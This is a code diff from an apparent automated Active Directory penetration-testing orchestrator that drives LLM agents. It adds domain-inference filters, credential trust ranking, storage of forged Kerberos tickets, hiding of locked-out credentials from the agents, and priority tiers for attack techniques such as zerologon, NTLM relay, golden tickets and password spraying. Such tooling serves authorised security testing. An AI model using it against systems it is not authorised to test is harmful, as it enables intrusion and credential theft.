@@ -392,13 +472,57 @@ mod tests { } #[tokio::test] - async fn publish_host_extracts_domain_from_fqdn() { + async fn publish_host_holds_inferred_domain_as_candidate() { + // A non-DC host's FQDN suffix is weak evidence — the suffix should + // land in candidate_domains, NOT state.domains, until corroborated. let state = SharedState::new("op-1".to_string()); let q = mock_queue(); let host = make_host("192.168.58.5", "srv01.contoso.local", false); state.publish_host(&q, host).await.unwrap(); + let s = state.inner.read().await; + assert!( + !s.domains.contains(&"contoso.local".to_string()), + "non-DC FQDN must not auto-promote into state.domains" + ); + assert!( + s.candidate_domains.contains_key("contoso.local"), + "non-DC FQDN should be recorded as a candidate" + ); + } + + #[tokio::test] + async fn publish_host_promotes_inferred_domain_when_matches_target() { + // If the operation's target.domain matches the inferred suffix, it's + // corroborated and promotes immediately. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + { + let mut s = state.inner.write().await; + s.target = Some(ares_core::models::Target { + ip: "192.168.58.10".into(), + hostname: String::new(), + domain: "contoso.local".into(), + environment: String::new(), + }); + } + let host = make_host("192.168.58.5", "srv01.contoso.local", false); + state.publish_host(&q, host).await.unwrap(); + + let s = state.inner.read().await; + assert!(s.domains.contains(&"contoso.local".to_string())); + } + + #[tokio::test] + async fn publish_host_promotes_dc_self_report() { + // A DC's own FQDN is a self-report — auto-promotes without corroboration. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let host = make_host("192.168.58.1", "dc01.contoso.local", true); + state.publish_host(&q, host).await.unwrap(); + let s = state.inner.read().await; assert!(s.domains.contains(&"contoso.local".to_string())); } @@ -608,6 +732,31 @@ mod tests { ); } + #[tokio::test] + async fn register_dc_skips_ambiguous_fallback_with_multiple_domains() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + // Two domains in state — fallback would be a guess. + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".to_string()); + s.domains.push("fabrikam.local".to_string()); + } + + // DC discovered with no FQDN — must NOT pick the first domain, + // because that would mis-map (e.g. parent DC under child domain) + // and the bad mapping survives later cleanup. + let host = make_host("192.168.58.1", "", true); + state.register_dc(&q, &host).await.unwrap(); + + let s = state.inner.read().await; + assert!( + s.domain_controllers.is_empty(), + "must skip registration when fallback domain is ambiguous" + ); + } + #[tokio::test] async fn register_dc_three_part_hostname_extracts_full_domain() { // Sanity check the >=3 parts branch with a deeper FQDN to make sure @@ -625,6 +774,46 @@ mod tests { ); } + #[tokio::test] + async fn publish_host_upgrades_short_hostname_to_fqdn_and_reregisters_dc() { + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + // Pre-populate two domains so the ambiguous fallback would fire + // if FQDN derivation didn't work. + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".to_string()); + s.domains.push("fabrikam.local".to_string()); + } + + // First sighting: short name only — register_dc must skip (ambiguous). + let h1 = make_host("192.168.58.1", "dc01", true); + state.publish_host(&q, h1).await.unwrap(); + { + let s = state.inner.read().await; + assert!(s.domain_controllers.is_empty()); + assert_eq!(s.hosts[0].hostname, "dc01"); + } + + // Second sighting: FQDN. Must upgrade hostname AND trigger + // re-registration so the DC lands under the correct domain. + let h2 = make_host("192.168.58.1", "dc01.fabrikam.local", true); + state.publish_host(&q, h2).await.unwrap(); + + let s = state.inner.read().await; + assert_eq!(s.hosts[0].hostname, "dc01.fabrikam.local"); + assert_eq!( + s.domain_controllers.get("fabrikam.local"), + Some(&"192.168.58.1".to_string()), + "DC must register under the domain derived from the upgraded FQDN" + ); + assert!( + !s.domain_controllers.contains_key("contoso.local"), + "must not also register under the wrong (first) domain" + ); + } + #[tokio::test] async fn publish_host_strips_trailing_dot() { let state = SharedState::new("op-1".to_string()); @@ -637,6 +826,100 @@ mod tests { assert_eq!(s.hosts[0].hostname, "srv01.contoso.local"); } + #[tokio::test] + async fn publish_host_rejects_default_windows_hostname_as_domain() { + // Regression: a non-domain-joined Windows host with the default + // `WIN-XXXX` hostname must NOT have its FQDN auto-extracted as a + // bogus AD domain (e.g. `win-hvtt4f8yn5n.ttb0.local`). + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let host = make_host( + "192.168.58.178", + "win-hvtt4f8yn5n.win-hvtt4f8yn5n.ttb0.local", + false, + ); + state.publish_host(&q, host).await.unwrap(); + + let s = state.inner.read().await; + assert!( + !s.domains.iter().any(|d| d.contains("win-")), + "default Windows hostname leaked into state.domains: {:?}", + s.domains + ); + assert!( + !s.candidate_domains + .keys() + .any(|d| d.contains("win-") || d.contains("ttb0.local")), + "default Windows hostname leaked into candidate_domains: {:?}", + s.candidate_domains + ); + } + + #[tokio::test] + async fn publish_host_rejects_desktop_oobe_hostname() { + // Win10/11 OOBE default `DESKTOP-XXXXXXX` should be filtered too — + // generalizes the cross-OS pre-filter beyond `WIN-` server names. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let host = make_host("192.168.58.179", "desktop-abc1234.workgroup.local", false); + state.publish_host(&q, host).await.unwrap(); + + let s = state.inner.read().await; + assert!(s.domains.is_empty()); + assert!( + s.candidate_domains.is_empty(), + "desktop-* hostname leaked: {:?}", + s.candidate_domains + ); + } + + #[tokio::test] + async fn register_dc_rejects_default_windows_hostname_no_fallback() { + // Even if a host is mis-detected as a DC, a default-Windows FQDN + // must not be accepted as the AD domain. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + + let host = make_host("192.168.58.178", "win-hvtt4f8yn5n.ttb0.local", true); + state.register_dc(&q, &host).await.unwrap(); + + let s = state.inner.read().await; + assert!( + s.domain_controllers.is_empty(), + "default Windows FQDN must not register as a DC domain" + ); + assert!( + !s.domains.iter().any(|d| d.contains("win-")), + "default Windows FQDN leaked into state.domains: {:?}", + s.domains + ); + } + + #[tokio::test] + async fn register_dc_default_windows_hostname_falls_back_to_known_domain() { + // If exactly one real domain is known, a DC discovered with a + // default-Windows FQDN should fall back to the real domain. + let state = SharedState::new("op-1".to_string()); + let q = mock_queue(); + { + let mut s = state.inner.write().await; + s.domains.push("contoso.local".to_string()); + } + + let host = make_host("192.168.58.1", "win-hvtt4f8yn5n.ttb0.local", true); + state.register_dc(&q, &host).await.unwrap(); + + let s = state.inner.read().await; + assert_eq!( + s.domain_controllers.get("contoso.local"), + Some(&"192.168.58.1".to_string()), + "expected fallback to the single known real domain" + ); + assert!(!s.domain_controllers.contains_key("ttb0.local")); + } + #[tokio::test] async fn publish_host_merges_os() { let state = SharedState::new("op-1".to_string()); diff --git a/ares-cli/src/orchestrator/state/publishing/kerberos.rs b/ares-cli/src/orchestrator/state/publishing/kerberos.rs new file mode 100644 index 00000000..6bceff72 --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/kerberos.rs @@ -0,0 +1,63 @@ +//! Kerberos ticket publishing — store forged inter-realm ccache records in state +//! and Redis so downstream tools can find them when NTLM bind fails. + +use anyhow::Result; + +use ares_core::models::KerberosTicket; +use ares_core::state::RedisStateReader; + +use redis::aio::ConnectionLike; + +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueueCore; + +impl SharedState { + /// Store a forged Kerberos ticket in in-memory state and Redis. + /// + /// Uses `HSET` (not `HSETNX`) so a freshly-forged ticket always replaces a + /// stale ccache path for the same `(source, target, username)` triple. + pub async fn publish_kerberos_ticket( + &self, + queue: &TaskQueueCore, + ticket: KerberosTicket, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + reader.add_kerberos_ticket(&mut conn, &ticket).await?; + { + let mut state = self.inner.write().await; + // Replace any existing entry for the same (source, target, username). + let key = ticket.dedup_key(); + state.kerberos_tickets.retain(|t| t.dedup_key() != key); + state.kerberos_tickets.push(ticket); + } + Ok(()) + } + + /// Find a Kerberos ticket for a specific (source_domain, target_domain, username) triple. + #[allow(dead_code)] + pub async fn find_kerberos_ticket( + &self, + source_domain: &str, + target_domain: &str, + username: &str, + ) -> Option { + let state = self.inner.read().await; + let src_l = source_domain.to_lowercase(); + let tgt_l = target_domain.to_lowercase(); + let user_l = username.to_lowercase(); + state + .kerberos_tickets + .iter() + .find(|t| { + t.source_domain.to_lowercase() == src_l + && t.target_domain.to_lowercase() == tgt_l + && t.username.to_lowercase() == user_l + }) + .cloned() + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/mod.rs b/ares-cli/src/orchestrator/state/publishing/mod.rs index 6cba8604..935c1fc3 100644 --- a/ares-cli/src/orchestrator/state/publishing/mod.rs +++ b/ares-cli/src/orchestrator/state/publishing/mod.rs @@ -2,10 +2,14 @@ //! to both in-memory state and Redis. mod credentials; +mod domains; mod entities; mod hosts; +mod kerberos; mod milestones; +pub use domains::DomainPublishOutcome; + use regex::Regex; use std::sync::LazyLock; @@ -13,6 +17,33 @@ use std::sync::LazyLock; pub(super) static PASSWORD_PREFIX_RE: LazyLock = LazyLock::new(|| Regex::new(r"(?i)^password\s*:\s*").unwrap()); +/// Trust ranking for a credential source. +/// +/// Used by `publish_credential` to decide whether a new (user, password) +/// pair claiming a different realm than an existing entry should be treated +/// as authoritative or as a phantom. Higher value = more trusted. +/// +/// - **High (3)**: deterministic, host-bound dumps where the realm is +/// pinned by the source DC's NTDS / LSA storage. +/// - **Medium (2)**: realm validated by an actual authentication round-trip +/// or by a cracking pipeline whose input was already realm-pinned. +/// - **Low (1)**: heuristic / format-fragile sources where the realm is +/// inferred from surrounding tool output and can bleed across forests +/// (description fields, registry autologon, SYSVOL scripts). +/// - **Unknown (0)**: anything not classified — treated as least trusted. +pub(super) fn credential_source_trust(source: &str) -> u8 { + match source { + "secretsdump" | "lsa_secrets" | "dpapi" | "kerberos_extracted" | "initial" => 3, + "netexec_auth" | "cracked:hashcat" | "cracked:john" | "cracked" => 2, + "description_field" + | "autologon_registry" + | "sysvol_script" + | "user_description_leak" + | "netexec_password" => 1, + _ => 0, + } +} + /// Regex matching trailing parenthetical metadata like ` (Guest)`, ` (Pwn3d!)`. pub(super) static TRAILING_PAREN_RE: LazyLock = LazyLock::new(|| Regex::new(r"\s+\([^)]+\)\s*$").unwrap()); @@ -102,6 +133,12 @@ pub(super) fn sanitize_credential( } } + // Canonicalize realm casing. AD realms are case-insensitive; storing them + // mixed-case (`CONTOSO.LOCAL` from one tool, `contoso.local` from another) + // splits the same identity into two state entries and slips past dedup + // keys built with `format!("{domain}\\{user}:{pass}")`. + cred.domain = cred.domain.to_lowercase(); + // Validate after sanitization if !crate::orchestrator::output_extraction::is_valid_credential(&cred.username, &cred.password) { @@ -111,10 +148,103 @@ pub(super) fn sanitize_credential( Some(cred) } -/// Check if a hostname is an AWS internal PTR name. -pub(super) fn is_aws_hostname(hostname: &str) -> bool { - let lower = hostname.to_lowercase(); - lower.starts_with("ip-") && lower.contains("compute.internal") +/// Strip the trailing "0." artifact that NetExec sometimes appends to domain +/// names (e.g. `dc01.contoso.local0.` → `dc01.contoso.local`, +/// `contoso.local0` → `contoso.local`). +pub(super) fn strip_netexec_artifact(s: &str) -> &str { + let s = s.trim_end_matches('.'); + // "0." already collapsed to "0" after trimming "."; strip if preceded by a label + match s.strip_suffix("0.") { + Some(clean) => clean.trim_end_matches('.'), + None => match s.strip_suffix('0') { + // Avoid stripping a real trailing 0 from e.g. "host10" — + // only strip if the char before the 0 is alphabetic (TLD-like). + Some(clean) if clean.ends_with(|c: char| c.is_ascii_alphabetic()) => clean, + _ => s, + }, + } +} + +/// Check if a label matches a known default-OS auto-generated hostname +/// (Windows OOBE, Win10/11 OOBE, AWS EC2 default). These appear on hosts +/// that haven't been renamed or domain-joined; they are never valid AD +/// domain labels. +/// +/// Matches: +/// - `WIN-XXXXXXXX` (Win Server / older Win, 8–15 alphanumeric tail) +/// - `DESKTOP-XXXXXXX` / `LAPTOP-XXXXXXX` (Win10/11 OOBE, exactly 7 alphanumerics) +/// - `ip-A-B-C-D` (AWS EC2 default) +pub(super) fn is_default_os_label(label: &str) -> bool { + let lower = label.to_lowercase(); + if let Some(suffix) = lower.strip_prefix("win-") { + let len = suffix.len(); + return (8..=15).contains(&len) && suffix.chars().all(|c| c.is_ascii_alphanumeric()); + } + if let Some(suffix) = lower + .strip_prefix("desktop-") + .or_else(|| lower.strip_prefix("laptop-")) + { + return suffix.len() == 7 && suffix.chars().all(|c| c.is_ascii_alphanumeric()); + } + if let Some(rest) = lower.strip_prefix("ip-") { + let octets: Vec<&str> = rest.split('-').collect(); + if octets.len() == 4 + && octets + .iter() + .all(|o| !o.is_empty() && o.chars().all(|c| c.is_ascii_digit())) + { + return true; + } + } + false +} + +/// Single predicate for "this multi-label DNS name could plausibly be a real +/// AD-style FQDN." Used both as a pre-filter on candidate domains +/// (`publish_candidate_domain`) and as a hostname-normalization gate on +/// `Host.hostname` (`publish_host`, `register_dc`) — every cloud / mDNS / +/// default-OS / bare-TLD rejection lives here so call sites don't have to +/// know the rules. +/// +/// Rejects shapes that are *never* AD domains across OS families: +/// - Empty / whitespace, or single-label (`local`, `workgroup`) +/// - Pure mDNS link-local TLDs (`localhost`, `localdomain`) +/// - Cloud / hypervisor internal suffixes (AWS `compute.internal`, +/// `amazonaws.com`; Azure `internal.cloudapp.net`; GCP `c..internal`) +/// - Any label (in any position) matching a known default-OS auto-name +/// (`WIN-XXXX`, `DESKTOP-XXXX`, `LAPTOP-XXXX`, `ip-A-B-C-D`) — an unrenamed +/// host can't be trusted as a source of AD domain truth even if its suffix +/// looks plausible. +pub(super) fn looks_like_real_domain(name: &str) -> bool { + let trimmed = name.trim().trim_end_matches('.').to_lowercase(); + if trimmed.is_empty() { + return false; + } + let labels: Vec<&str> = trimmed.split('.').collect(); + if labels.len() < 2 { + return false; + } + if matches!(trimmed.as_str(), "localhost" | "localdomain") { + return false; + } + if labels + .last() + .map(|l| matches!(*l, "localhost" | "localdomain")) + .unwrap_or(false) + { + return false; + } + if trimmed.contains("compute.internal") + || trimmed.ends_with(".amazonaws.com") + || trimmed.ends_with(".internal.cloudapp.net") + || (trimmed.starts_with("c.") && trimmed.ends_with(".internal")) + { + return false; + } + if labels.iter().any(|l| is_default_os_label(l)) { + return false; + } + true } #[cfg(test)] @@ -137,6 +267,8 @@ mod tests { } } + // --- sanitize_credential --- + #[test] fn valid_credential_passes_through() { let cred = make_cred("alice", "P@ssw0rd!", "contoso.local"); @@ -223,6 +355,17 @@ mod tests { assert_eq!(result.domain, "child.contoso.local"); } + #[test] + fn realm_case_canonicalized_to_lowercase() { + // Tools surface realm in mixed/upper case (`CONTOSO.LOCAL` from + // rpcclient, `Contoso.Local` from LDAP). Without canonicalization, the + // same identity ends up split across multiple state entries and + // realm-strict credential lookups miss matches. + let cred = make_cred("alice", "P@ssw0rd!", "CONTOSO.LOCAL"); + let result = sanitize_credential(cred, &HashMap::new()).unwrap(); + assert_eq!(result.domain, "contoso.local"); + } + #[test] fn netbios_domain_resolved_to_fqdn() { let mut map = HashMap::new(); @@ -269,23 +412,127 @@ mod tests { assert!(sanitize_credential(cred, &HashMap::new()).is_none()); } + // --- is_default_os_label --- + #[test] - fn aws_hostname_detected() { - assert!(is_aws_hostname("ip-10-0-0-1.ec2.compute.internal")); + fn default_os_label_detects_windows_oobe() { + assert!(is_default_os_label("WIN-HVTT4F8YN5N")); + assert!(is_default_os_label("win-hvtt4f8yn5n")); + assert!(is_default_os_label("WIN-ABCDEFGH")); } #[test] - fn aws_hostname_case_insensitive() { - assert!(is_aws_hostname("IP-10-0-0-1.EC2.COMPUTE.INTERNAL")); + fn default_os_label_detects_win10_11_oobe() { + assert!(is_default_os_label("DESKTOP-ABC1234")); + assert!(is_default_os_label("desktop-abc1234")); + assert!(is_default_os_label("LAPTOP-XYZ7890")); + // Wrong tail length (Win10/11 OOBE is exactly 7). + assert!(!is_default_os_label("DESKTOP-ABCDEFGH")); + assert!(!is_default_os_label("DESKTOP-ABC")); } #[test] - fn non_aws_hostname_rejected() { - assert!(!is_aws_hostname("webserver01.contoso.local")); + fn default_os_label_detects_aws_default() { + assert!(is_default_os_label("ip-10-0-1-50")); + assert!(is_default_os_label("ip-192-168-1-1")); + // Not 4 octets: + assert!(!is_default_os_label("ip-10-0-1")); + // Non-numeric: + assert!(!is_default_os_label("ip-foo-bar-baz-qux")); } #[test] - fn ip_prefix_without_compute_internal_rejected() { - assert!(!is_aws_hostname("ip-missing-suffix.local")); + fn default_os_label_rejects_legitimate_names() { + assert!(!is_default_os_label("dc01")); + assert!(!is_default_os_label("contoso")); + assert!(!is_default_os_label("local")); + // Too short + assert!(!is_default_os_label("WIN-ABC")); + // Too long + assert!(!is_default_os_label("WIN-ABCDEFGHIJKLMNOP")); + // Wrong prefix + assert!(!is_default_os_label("LIN-ABCDEFGH")); + // Contains non-alphanumerics + assert!(!is_default_os_label("WIN-HVTT4F8.YN5N")); + } + + #[test] + fn looks_like_real_domain_accepts_typical_ad() { + assert!(looks_like_real_domain("contoso.local")); + assert!(looks_like_real_domain("child.contoso.local")); + assert!(looks_like_real_domain("eu.contoso.local")); + assert!(looks_like_real_domain("contoso.com")); + } + + #[test] + fn looks_like_real_domain_rejects_bare_tld_and_mdns() { + assert!(!looks_like_real_domain("local")); + assert!(!looks_like_real_domain("")); + assert!(!looks_like_real_domain("localhost")); + assert!(!looks_like_real_domain("foo.localhost")); + assert!(!looks_like_real_domain("foo.localdomain")); + } + + #[test] + fn looks_like_real_domain_rejects_cloud_internals() { + assert!(!looks_like_real_domain("us-west-2.compute.internal")); + assert!(!looks_like_real_domain("eu-west-1.amazonaws.com")); + assert!(!looks_like_real_domain("vm123.internal.cloudapp.net")); + assert!(!looks_like_real_domain("c.myproject.internal")); + } + + #[test] + fn looks_like_real_domain_rejects_default_os_labels_anywhere() { + assert!(!looks_like_real_domain("win-hvtt4f8yn5n.ttb0.local")); + assert!(!looks_like_real_domain("desktop-abc1234.workgroup.local")); + assert!(!looks_like_real_domain("ip-10-0-0-1.something.com")); + assert!(!looks_like_real_domain("dc01.win-abc12345.contoso.local")); + assert!(!looks_like_real_domain( + "ip-10-0-0-1.us-west-2.compute.internal" + )); + } + + // --- strip_netexec_artifact --- + + #[test] + fn strip_netexec_zero_dot() { + assert_eq!( + strip_netexec_artifact("dc01.contoso.local0."), + "dc01.contoso.local" + ); + } + + #[test] + fn strip_netexec_zero_no_dot() { + assert_eq!( + strip_netexec_artifact("dc01.contoso.local0"), + "dc01.contoso.local" + ); + } + + #[test] + fn strip_netexec_preserves_clean_hostname() { + assert_eq!( + strip_netexec_artifact("dc01.contoso.local"), + "dc01.contoso.local" + ); + } + + #[test] + fn strip_netexec_preserves_numeric_suffix() { + // Must NOT strip the 0 from "host10" or "dc10" + assert_eq!(strip_netexec_artifact("host10"), "host10"); + assert_eq!( + strip_netexec_artifact("dc10.contoso.local"), + "dc10.contoso.local" + ); + } + + #[test] + fn strip_netexec_child_domain() { + assert_eq!( + strip_netexec_artifact("dc02.child.contoso.local0."), + "dc02.child.contoso.local" + ); } } diff --git a/ares-cli/src/orchestrator/state/shared.rs b/ares-cli/src/orchestrator/state/shared.rs index ea805d49..03f91cf2 100644 --- a/ares-cli/src/orchestrator/state/shared.rs +++ b/ares-cli/src/orchestrator/state/shared.rs @@ -34,9 +34,29 @@ impl SharedState { &s.domain_controllers, ); + // Hide quarantined credentials from LLM agents. A locked-out + // account can't authenticate during the quarantine window, and + // surfacing it just invites more failed-auth attempts on the same + // account (which keep the badPwdCount climbing on shared lockout + // policies). The state's own resolvers already filter + // is_credential_quarantined for automation paths; this filter does + // the same for the LLM-facing snapshot. + let credentials: Vec<_> = s + .credentials + .iter() + .filter(|c| !s.is_credential_quarantined(&c.username, &c.domain)) + .cloned() + .collect(); + let hashes: Vec<_> = s + .hashes + .iter() + .filter(|h| !s.is_credential_quarantined(&h.username, &h.domain)) + .cloned() + .collect(); + ares_llm::prompt::StateSnapshot { - credentials: s.credentials.clone(), - hashes: s.hashes.clone(), + credentials, + hashes, hosts: s.hosts.clone(), shares: s.shares.clone(), domains: s.domains.clone(), @@ -203,6 +223,69 @@ mod tests { assert!(key.starts_with("ares:discoveries:")); } + #[tokio::test] + async fn snapshot_hides_quarantined_credentials() { + let state = SharedState::new("op-1".into()); + { + let mut inner = state.write().await; + inner.credentials.push(Credential { + id: "c1".into(), + username: "live_user".into(), + password: "p1".into(), + domain: "contoso.local".into(), + source: "test".into(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }); + inner.credentials.push(Credential { + id: "c2".into(), + username: "locked_user".into(), + password: "p2".into(), + domain: "contoso.local".into(), + source: "test".into(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }); + inner.hashes.push(Hash { + id: "h1".into(), + username: "locked_user".into(), + hash_type: "NTLM".into(), + hash_value: "aabbcc".into(), + domain: "contoso.local".into(), + source: "test".into(), + cracked_password: None, + aes_key: None, + discovered_at: Some(chrono::Utc::now()), + parent_id: None, + attack_step: 0, + }); + inner.hashes.push(Hash { + id: "h2".into(), + username: "live_user".into(), + hash_type: "NTLM".into(), + hash_value: "ddeeff".into(), + domain: "contoso.local".into(), + source: "test".into(), + cracked_password: None, + aes_key: None, + discovered_at: Some(chrono::Utc::now()), + parent_id: None, + attack_step: 0, + }); + inner.quarantine_credential("locked_user", "contoso.local"); + } + + let snap = state.snapshot().await; + assert_eq!(snap.credentials.len(), 1, "quarantined cred must be hidden"); + assert_eq!(snap.credentials[0].username, "live_user"); + assert_eq!(snap.hashes.len(), 1, "quarantined hash must be hidden"); + assert_eq!(snap.hashes[0].username, "live_user"); + } + #[tokio::test] async fn snapshot_with_vulnerabilities() { let state = SharedState::new("op-1".into()); diff --git a/ares-cli/src/orchestrator/strategy.rs b/ares-cli/src/orchestrator/strategy.rs index 22fb9f6f..347d795f 100644 --- a/ares-cli/src/orchestrator/strategy.rs +++ b/ares-cli/src/orchestrator/strategy.rs @@ -292,45 +292,126 @@ fn fast_weights() -> HashMap { ("adcs_esc8", 5), ("gpo_abuse", 6), ("laps", 4), + ("ntlm_relay", 5), + ("nopac", 4), + ("zerologon", 3), + ("printnightmare", 6), + ("share_coercion", 5), + ("mssql_coercion", 4), + ("password_policy", 3), + ("gpp_sysvol", 3), + ("ntlmv1_downgrade", 3), + ("ldap_signing", 3), + ("webdav_detection", 4), + ("spooler_check", 3), + ("machine_account_quota", 3), + ("dfs_coercion", 5), + ("petitpotam_unauth", 4), + ("winrm_lateral", 5), + ("group_enumeration", 2), + ("localuser_spray", 4), + ("krbrelayup", 5), + ("searchconnector_coercion", 5), + ("lsassy_dump", 3), + ("rdp_lateral", 5), + ("foreign_group_enum", 3), + ("certipy_auth", 2), + ("sid_enumeration", 3), + ("dns_enum", 3), + ("domain_user_enumeration", 2), + ("pth_spray", 4), + ("certifried", 4), + ("dacl_abuse", 2), + ("smbclient_enum", 4), + ("cross_forest_enum", 3), + ("acl_discovery", 2), ] .into_iter() .map(|(k, v)| (k.to_string(), v)) .collect() } -/// Comprehensive: flat priorities so all techniques get equal attention. +/// Comprehensive: prioritize exploitation breadth over speed-to-DA. +/// +/// With flat priorities (old design), the deferred queue drained FIFO, meaning +/// the credential pipeline (AS-REP → Kerberoast → secretsdump) always won +/// because its conditions were met first. ADCS, delegation, NTLM relay, and +/// other exploitation techniques never got slots before DA terminated the op. +/// +/// This design uses 3 tiers: +/// 1 = high-value exploitation (ADCS, delegation, NTLM relay, ACL abuse) +/// 2 = credential pipeline + lateral movement +/// 3 = recon, enumeration, low-value checks +/// +/// The goal: exploit *everything* discovered, not just the fastest path to DA. fn comprehensive_weights() -> HashMap { [ - ("dc_secretsdump", 3), - ("golden_ticket", 3), - ("forest_trust_escalation", 3), - ("child_to_parent", 3), - ("domain_admin", 3), - ("secretsdump", 3), - ("credential_reuse", 3), - ("mssql_access", 3), - ("mssql_linked_server", 3), - ("mssql_impersonation", 3), - ("constrained_delegation", 3), - ("unconstrained_delegation", 3), - ("esc1", 3), - ("esc4", 3), - ("esc8", 3), - ("rbcd", 3), - ("acl_abuse", 3), - ("shadow_credentials", 3), - ("mssql_deep_exploitation", 3), - ("kerberoast", 3), - ("asrep_roast", 3), - ("password_spray", 3), - ("gmsa", 3), - ("low_hanging_fruit", 3), + // --- Tier 1: Exploitation breadth (these were starved before) --- + ("esc1", 1), + ("esc4", 1), + ("esc8", 1), + ("adcs_esc1", 1), + ("adcs_esc4", 1), + ("adcs_esc8", 1), + ("constrained_delegation", 1), + ("unconstrained_delegation", 1), + ("ntlm_relay", 1), + ("rbcd", 1), + ("acl_abuse", 1), + ("dacl_abuse", 1), + ("shadow_credentials", 1), + ("gpo_abuse", 1), + ("nopac", 1), + ("certifried", 1), + ("krbrelayup", 1), + ("printnightmare", 1), + // --- Tier 2: Credential pipeline + lateral + persistence --- + ("dc_secretsdump", 2), + ("golden_ticket", 2), + ("forest_trust_escalation", 2), + ("child_to_parent", 2), + ("domain_admin", 2), + ("secretsdump", 2), + ("credential_reuse", 2), + ("mssql_access", 2), + ("mssql_linked_server", 2), + ("mssql_impersonation", 2), + ("mssql_deep_exploitation", 2), + ("kerberoast", 2), + ("asrep_roast", 2), + ("password_spray", 2), + ("gmsa", 2), + ("laps", 2), + ("low_hanging_fruit", 2), + ("gpp_sysvol", 2), + ("certipy_auth", 2), + ("lsassy_dump", 2), + ("pth_spray", 2), + ("winrm_lateral", 2), + ("rdp_lateral", 2), + ("localuser_spray", 2), + // --- Tier 3: Recon, enumeration, coercion setup --- ("smb_signing_disabled", 3), - ("adcs_esc1", 3), - ("adcs_esc4", 3), - ("adcs_esc8", 3), - ("gpo_abuse", 3), - ("laps", 3), + ("share_coercion", 3), + ("mssql_coercion", 3), + ("password_policy", 3), + ("ntlmv1_downgrade", 3), + ("ldap_signing", 3), + ("webdav_detection", 3), + ("spooler_check", 3), + ("machine_account_quota", 3), + ("dfs_coercion", 3), + ("petitpotam_unauth", 3), + ("group_enumeration", 3), + ("searchconnector_coercion", 3), + ("foreign_group_enum", 3), + ("sid_enumeration", 3), + ("dns_enum", 3), + ("domain_user_enumeration", 3), + ("smbclient_enum", 3), + ("zerologon", 3), + ("cross_forest_enum", 3), + ("acl_discovery", 2), ] .into_iter() .map(|(k, v)| (k.to_string(), v)) @@ -370,6 +451,39 @@ fn stealth_weights() -> HashMap { ("adcs_esc8", 2), ("gpo_abuse", 3), ("laps", 3), + ("ntlm_relay", 7), + ("nopac", 5), + ("zerologon", 4), + ("printnightmare", 8), + ("share_coercion", 6), + ("mssql_coercion", 5), + ("password_policy", 2), + ("gpp_sysvol", 2), + ("ntlmv1_downgrade", 2), + ("ldap_signing", 2), + ("webdav_detection", 3), + ("spooler_check", 2), + ("machine_account_quota", 2), + ("dfs_coercion", 6), + ("petitpotam_unauth", 5), + ("winrm_lateral", 4), + ("group_enumeration", 2), + ("localuser_spray", 7), + ("krbrelayup", 4), + ("searchconnector_coercion", 6), + ("lsassy_dump", 5), + ("rdp_lateral", 4), + ("foreign_group_enum", 2), + ("certipy_auth", 1), + ("sid_enumeration", 2), + ("dns_enum", 2), + ("domain_user_enumeration", 2), + ("pth_spray", 5), + ("certifried", 3), + ("dacl_abuse", 2), + ("smbclient_enum", 3), + ("cross_forest_enum", 2), + ("acl_discovery", 1), ] .into_iter() .map(|(k, v)| (k.to_string(), v)) @@ -471,11 +585,20 @@ mod tests { } #[test] - fn comprehensive_flat_weights() { + fn comprehensive_tiered_weights() { let s = Strategy::from_preset(StrategyPreset::Comprehensive); - assert_eq!(s.effective_priority("secretsdump"), 3); - assert_eq!(s.effective_priority("esc1"), 3); - assert_eq!(s.effective_priority("acl_abuse"), 3); + // Tier 1: exploitation breadth — highest priority + assert_eq!(s.effective_priority("esc1"), 1); + assert_eq!(s.effective_priority("acl_abuse"), 1); + assert_eq!(s.effective_priority("constrained_delegation"), 1); + assert_eq!(s.effective_priority("ntlm_relay"), 1); + // Tier 2: credential pipeline + assert_eq!(s.effective_priority("secretsdump"), 2); + assert_eq!(s.effective_priority("kerberoast"), 2); + assert_eq!(s.effective_priority("golden_ticket"), 2); + // Tier 3: recon/enumeration + assert_eq!(s.effective_priority("group_enumeration"), 3); + assert_eq!(s.effective_priority("dns_enum"), 3); } #[test] @@ -625,7 +748,44 @@ mod tests { #[test] fn new_technique_weights_in_presets() { // Verify that new techniques added in this branch are in all presets - let new_techniques = ["rbcd", "shadow_credentials", "mssql_deep_exploitation"]; + let new_techniques = [ + "rbcd", + "shadow_credentials", + "mssql_deep_exploitation", + "ntlm_relay", + "nopac", + "zerologon", + "printnightmare", + "share_coercion", + "mssql_coercion", + "password_policy", + "gpp_sysvol", + "ntlmv1_downgrade", + "ldap_signing", + "webdav_detection", + "spooler_check", + "machine_account_quota", + "dfs_coercion", + "petitpotam_unauth", + "winrm_lateral", + "group_enumeration", + "localuser_spray", + "krbrelayup", + "searchconnector_coercion", + "lsassy_dump", + "rdp_lateral", + "foreign_group_enum", + "certipy_auth", + "sid_enumeration", + "dns_enum", + "domain_user_enumeration", + "pth_spray", + "certifried", + "dacl_abuse", + "smbclient_enum", + "cross_forest_enum", + "acl_discovery", + ]; for preset in [ StrategyPreset::Fast, StrategyPreset::Comprehensive, @@ -643,20 +803,26 @@ mod tests { } #[test] - fn comprehensive_has_equal_weights() { + fn comprehensive_has_tiered_weights() { let s = Strategy::from_preset(StrategyPreset::Comprehensive); - // All comprehensive weights should be 3 + // All weights should be 1, 2, or 3 for (tech, weight) in &s.weights { - assert_eq!(*weight, 3, "Technique {tech} has weight {weight} != 3"); + assert!( + (1..=3).contains(weight), + "Technique {tech} has weight {weight}, expected 1-3" + ); } } #[test] fn stealth_penalizes_noisy_techniques() { let s = Strategy::from_preset(StrategyPreset::Stealth); - // Password spray and SMB signing should be most penalized (8) + // Password spray, 